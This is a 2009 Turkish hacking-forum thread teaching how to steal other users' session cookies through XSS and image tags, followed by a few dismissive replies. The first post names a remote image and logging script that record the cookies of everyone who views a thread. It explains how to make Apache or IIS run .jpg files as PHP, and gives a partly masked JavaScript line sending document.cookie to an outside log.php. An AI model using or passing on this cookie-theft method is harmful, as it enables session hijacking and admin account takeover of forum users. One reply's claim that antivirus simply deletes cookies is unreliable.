İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Cookies Çalıma

31-10-2009 19:58
#1
engin0100 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Nereden:
TÜRKİYE CUMHURİYETİ
Yaş:
9
Mesajlar:
1.095
Teşekkür (Etti):
58
Teşekkür (Aldı):
567
Konular:
166
Ticaret:
(0) %
Cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.Bu dosyalardaki bilgiler XSS saldırıları ile çalınabilinir ve o siteye sizin kullanıcı adınız ile cookie sayesinde oturum açabilirler.



Bazı portal ve forumlarda forumda kodu kullanılarakta cookie çalınabilmektedir.



Foruma mesaj atarken IMG tag ı içine [hide]http://antichat.ru/cgi-bin/s.jpg[/hide] bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi [hide]http://antichat.ru/sniff/log.php[/hide] adresinde loglanıcaktır.







Peki gelelim [hide]http://antichat.ru/cgi-bin/s.jpg[/hide] nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.



Serverınızda apache veya IIS kurulu ise yapmanız gerekenler



Apache için



Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz



IIS de bu işlemi



Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.



Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine



Kod:

********.********=’http://www.site.com/log.php?’+escape(********.cookie)



yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmak



Log.php kodları:



Kod:
Kullanıcı İmzası
Değerli Muhteremler Saygı ve Sevgilerimle
Süresiz BAN İstiyorum....
Sebeb:Pisikoloji Bunalım...
adıyamanlıyılmaz Teşekkür etti.

31-10-2009 21:20
#2
Doruq91 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Nereden:
.exe
Mesajlar:
187
Teşekkür (Etti):
5
Teşekkür (Aldı):
20
Konular:
18
Ticaret:
(0) %
Coocies Leri antiler virus olarak tanıdıkları için anında siliniyor bunları yapmaya gerek kalmıyor
31-10-2009 21:24
#3
Üyelik tarihi:
10/2009
Mesajlar:
12
Teşekkür (Etti):
1
Teşekkür (Aldı):
1
Konular:
1
Ticaret:
(0) %
o zaman hiç yapmayalım daha iyi
17-11-2009 10:18
#4
Üyelik tarihi:
11/2009
Mesajlar:
50
Teşekkür (Etti):
34
Teşekkür (Aldı):
3
Konular:
6
Ticaret:
(0) %
pff sacmalık..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı